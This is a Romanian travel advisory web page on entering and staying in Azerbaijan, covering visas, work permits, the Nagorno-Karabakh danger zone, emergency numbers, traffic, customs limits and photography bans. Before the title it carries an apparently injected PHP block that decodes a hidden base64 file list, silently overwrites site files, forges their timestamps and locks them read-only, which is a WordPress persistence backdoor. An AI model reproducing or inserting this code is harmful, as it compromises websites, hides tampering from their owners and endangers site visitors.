$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Azerbaidjan – O noua atitudine

Condiţii de intrare şi regim de şedere

Pentru cetăţenii români care călătoresc în Republica Azerbaidjan este necesară obţinerea, în prealabil, a vizei de intrare. Viza de intrare se poate obţine de la Ambasada Republicii Azerbaidjan la Bucureşti. 

Autorităţile din Republica Azerbaidjan nu eliberează vize de intrare la frontiera.
Se poate solicita viza turistică, prin intermediul agenţiilor de turism, care au dreptul să depună la misiunile diplomatice ale acestei ţări cererea şi actele de viză on-line sau prin curier. Astfel, se poate obţine o viză electronică, care nu se aplică în paşaport, ci se va acorda la punctul de trecere al frontierei.

Atenţie! În cazul în care apelaţi la această variantă de obţinere a vizei, vă recomandăm să acţionaţi din timp, întrucât procedura durează cel puţin 15 zile.

Durata de şedere permisă de viză variază de la o săptămână până la un an.
Cetăţenii români au obligaţia ca, în termen de 3 zile de la data intrării pe teritoriul Republicii Azerbaidjan, să se prezinte la oficiul local al poliţiei pentru a-şi înregistra şederea. Obligaţia se consideră respectată prin înregistrarea la un hotel.

Nerespectarea obligaţiei de înregistrare, depăşirea termenului de şedere, încălcarea scopului declarat al călătoriei sau imposibilitatea dovedirii datei de intrare pe teritoriul naţional sunt considerate încălcări ale legislaţiei privind regimul străinilor şi se sancţionează cu amendă.

Atenţie! Autorităţile locale recunosc paşapoartele temporare, în baza acestora Oficiul de Stat pentru Imigrări a eliberat inclusiv permise de muncă cu valabilitate de 12 luni pentru cetăţenii români.

Pentru informaţii suplimentare despre condiţiile de intrare şi regimul de şedere în Republica Azerbaidjan, recomandăm consultarea informaţiilor oficiale furnizate de autorităţile azere:

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze misiunii diplomatice a României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.


Condiţii de şedere pentru cei care intenţionează să muncească în Republica Azerbaidjan

Permisul de şedere temporară în această ţară poate fi obţinut prin parcurgerea următorilor paşi prevăzuţi de lege:

 • Angajatorul azer trebuie să obţină aprobarea Ministerului Muncii şi Protecţiei Sociale local;
 • Fiecare angajat străin trebuie să obţină de la Serviciul de Stat pentru Imigraţie un permis de şedere temporară, care este valabil un an – permisul se poate prelungi de maximum patru ori;
 • După obţinerea permisului, cetăţenii străini trebuie să se prezinte la Ministerul de Interne pentru a se înregistra în calitate de rezidenţi.
 • Obţinerea permisului de şedere temporară este necesară şi pentru persoanele căsătorite cu cetăţeni azeri sau care trăiesc în concubinaj, cei care au investiţii în economia azeră, precum şi pentru studenţi.

Nerespectarea prevederilor legale poate fi sancţionată cu pedepse care pot conduce şi la privarea de libertate.

Ameninţări teroriste

Terorismul este un fenomen global, nelocalizat, prin urmare nici Azerbaidjan nu poate fi exclusă din faţa acestei ameninţări.

Cetăţenilor români care călătoresc în Azerbaidjan li se recomandă să urmărească în permanenţă anunţurile şi recomandările făcute de autorităţile azere şi să acceseze periodic pagina web a Ministerului român al Afacerilor Externe.

Siguranţă şi criminalitate

Recomandăm cetăţenilor români să evite deplasarea pe teritoriul regiunii Nagorno-Karabah, din Republica Azerbaidjan, precum şi în zona adiacentă acesteia, din cauza situaţiei instabile de securitate din zonă. Facem această recomandare deoarece  în Nagorno-Karabakh şi în zona adiacentă, militarizată, există riscul prezenţei unor dispozitive explozive amorsate şi chiar pericolul unor schimburi sporadice de focuri între unităţile militare azere şi armene aflate de-o parte şi de alta a liniei de contact.

Autorităţile azere au informat că îşi rezervă dreptul de a declara persona non grata pe teritoriul Republicii Azerbaidjan orice cetăţean străin care se deplasează în regiunea Nagorno-Karabah, fără obţinerea unei aprobări prealabile din partea Guvernului Republicii Azerbaidjan.

În cazul necesităţii stringente a efectuării de deplasări în regiunea Nagorno-Karabah de către cetăţeni români, aceştia sunt sfătuiţi să contacteze Ambasada Republicii Azerbaidjan la Bucureşti.
Menţionăm că autorităţile române nu pot asigura asistenţă consulară cetăţenilor români pe teritoriul regiunii Nagorno-Karabah.
Azerbaidjan este o ţară relativ sigură din punctul vedere al siguranţei turiştilor. Infracţiuni de tipul furtului din buzunare, înşelăciunilor sau furtului din maşini sunt relativ rare, dar pot apărea în zone aglomerate (gări, staţii, parcări, centre comerciale, benzinării sau zone de servicii pe autostrăzi).

Recomandări generale:

 •  Păstraţi în locuri sigure documentele şi valorile personale, biletele de călătorie banii, cărţile de credit şi nu le expuneţi în mod vizibil asupra dumneavoastră sau în maşini.
 •  Maşinile trebuie încuiate şi asigurate cu sisteme de alarmă.
 •  În cazul călătoriei cu autobuzul sau trenul păstraţi atenţia asupra bagajelor pe întreaga durată a călătoriei.
 •  În cazul unor incidente care afectează siguranţa persoanei sau a bunurilor, se recomandă contactarea celui mai apropiat birou al poliţiei.

În cazul pierderii paşaportului românesc, se recomandă sesizarea atât a biroului local de poliţie, cât şi a oficiului consular român cel mai apropiat.

În cazul unor incidente grave (accidente, tâlhării), care necesită intervenţia imediată a autorităţilor locale, trebuie apelate următoarele numere de urgenţă:

 •  102 – poliţia
 •  103  –  salvarea
 •  101  –  pompierii

Se recomandă, de asemenea, sesizarea Ambasadei României în Republica Azerbaidjan, care poate acorda asistenţa consulară în condiţiile prevăzute de lege.

Sistemul medical

Vă recomandăm cu insistenţă să vă încheiaţi o asigurare de călătorie, medicală şi de viaţă.

Atenţie: verificaţi cu societatea de asigurări din România dacă aceasta este recunoscută de unităţile medicale din Azerbaidjan şi condiţiile în care poate fi utilizată.
Există de asemenea posibilitatea încheierii unor asigurări medicale pe plan local. În principiu, serviciile medicale în Azerbaidjan sunt scumpe şi unităţile medicale nu sunt dotate corespunzător.

Condiţii privind traficul auto

 •  Circulaţia auto

Sistemul de circulaţie auto este similar celui european.

Conducerea sub influenţa alcoolului este strict interzisă.
În trafic sunt frecvent încălcate unele reguli de circulaţie, inclusiv cele referitoare la acordarea priorităţii, depăşirea vitezei legale, trecerea pe culoarea roşie a semaforului.
Pentru pietoni este recomandat să manifeste atenţie sporită la traversarea străzilor, conducătorii auto neacordând prioritate la trecerile marcate, fiind ignorate foarte des şi semafoarele.

 •  Starea drumurilor

Starea generală a drumurilor este bună.

 •  Permisul de conducere

Permisul de conducere românesc este recunoscut.

 •  Informaţii pentru cazurile de accident de circulaţie

Indiferent de gravitatea accidentului rutier, persoana implicată trebuie să acorde imediat primul ajutor victimei şi să anunţe cel mai apropiat post de poliţie. După întocmirea procesului verbal de constatare de către poliţie, se contactează firma de asigurare (medicală, CASCO şi asigurarea obligatorie pentru şoferi).

Utilizarea cărţilor de credit

Nu este răspândit sistemul de plăţi efectuate prin carte de credit. Se recomandă prudenţă în folosirea acestora şi verificarea regulată a contului bancar pentru a putea face sesizare în caz de nevoie.

Reglementări vamale

La intrarea în Azerbaidjan posesorii de paşapoarte simple trebuie să completeze o declaraţie vamală tipizată, în care se indică suma în valută, obiectele din aur, argint, arme etc., care se ştampilează la trecerea prin punctul vamal.

Atentie! Această declaraţie vamală trebuie păstrată şi prezentată la ieşirea din ţară, când se va completa o alta declaraţie vamală.
La intrarea în Republica Azerbaidjan cu autoturismul personal se depune o garanţie materială (de ordinul a câteva mii manaţi – monedă aproximativ egală cu euro) care se recuperează foarte greu la plecarea din această ţară.

În cazul în care la intrarea pe teritoriul Republicii Azerbaidjan nu a fost completată o declaraţie vamală (în care să fie indicată suma deţinută/introdusă), cetăţenii străini au dreptul să scoată până la 1000 USD sau echivalentul în altă valută.

Cetăţenii străini au dreptul să scoată din Azerbaidjan, în baza unei declaraţii vamale, până la 10 mii USD sau echivalentul în altă valută.

Peste 10.000 USD sunt necesare documente care să ateste cumpărarea, extragerea din cont, introducerea anterioară în Azerbaidjan.

Nu există nici un fel de restricţii la introducerea valutei în Republica Azerbaidjan de către persoanele fizice, cu condiţia ca aceasta să fie declarată în scris, fiind demonstrată provenienţa banilor.

La ieşirea din Azerbaidjan către ţările care fac parte din Uniunea Vamala (CSI) se poate scoate orice sumă în numerar fără declarare şi prezentare de adeverinţe.

Se permite tranzitarea, fără plata taxelor vamale, de către persoane fizice, a mărfurilor care nu au destinaţie de producţie sau scopuri comerciale, în valoare de până la 1.000 USD şi 50 kg de persoană; în cazul valorii mărfurilor de până la 5.000 USD şi greutăţii totale de până la 250 kg se aplică o formă simplificată de declarare, cu plata impozitelor şi taxelor vamale aferente, iar ceea ce depăşeşte limitele de mai sus – conform normelor general stabilite.

Pentru informaţii generale despre reglementările vamale din Republica Azerbaidjan poate fi accesat website-ul Comitetului Vamal de Stat (http://customs.gov.az/en/).

Restricţii privind fotografierea şi înregistrările audio-video

În Republica Azerbaidjan nu se permite fotografierea şi înregistrarea audio-video a persoanelor (chiar atunci când se află în spaţii publice) fără acordul acestora.
Fotografierea clădirilor instituţiilor publice este interzisă.

By o9admin